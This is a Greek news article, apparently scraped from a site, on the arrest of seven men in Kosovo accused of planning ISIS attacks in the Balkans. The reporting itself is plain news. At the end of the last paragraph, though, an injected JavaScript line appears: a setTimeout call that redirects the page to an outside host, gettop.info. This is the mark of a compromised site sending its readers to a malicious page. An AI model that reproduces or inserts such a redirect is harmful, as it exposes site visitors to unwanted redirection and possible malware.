Συνελήφθησαν 7 άνδρες στο Κόσοβο – Σχεδίαζαν επιθέσεις στα Βαλκάνια για το ISIS

0
7

 

Επτά άνδρες συνελήφθησαν στο Κόσοβο κατηγορούμενοι ότι προετοίμαζαν τρομοκρατικές επιθέσεις στα Βαλκάνια δρώντας για λογιαριασμό του Ισλαμικού Κράτους, ενώ λάμβαναν εντολές από άλλους τζιχαντιστές στη Συρία. Οι συλλήψεις έγιναν σε τρεις διαφορετικές πόλεις ενώ και οι επτά προφυλακίστηκαν για διάστημα 30 ημερών, όσο συνεχίζονται οι έρευνες.

Σύμφωνα με τους εισαγγελείς, οι συλληφθέντες ήρθαν σε επαφή τον Σεπτέμβριο και τον Οκτώβριο με ένα μέλος του ISIS, τον Λαβντρίμ Μουχαξέρι, τον αυτοαποκαλούμενο «διοικητή των Αλβανών στη Συρία και Ιράκ»

Οι επτά άνδρες είχαν επαφές με άλλα πρόσωπα σε γειτονικές χώρες, όπως στην ΠΓΔΜ και την Αλβανία ενώ άλλοι ύποπτοι διαφεύγουν, σύμφωνα με ένα έγγραφο των εισαγγελικών αρχών.

Στο Κόσοβο δεν έχει σημειωθεί καμία επίθεση τζιχαντιστών όμως τουλάχιστον 200 άνθρωποι έχουν συλληφθεί ή έχουν ξεκινήσει έρευνες σε βάρος τους. Εκτιμάται ότι περίπου 300 Κοσοβάροι έχουν φύγει για να πολεμήσουν με το ΙΚ στη Συρία και το Ιράκ.

Η ομάδα αυτή ήθελε να ιδρύσει ένα τοπικό παρακλάδι του Ισλαμικού Κράτους. Ένας από τους άνδρες πολέμησε στο παρελθόν στη Συρία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here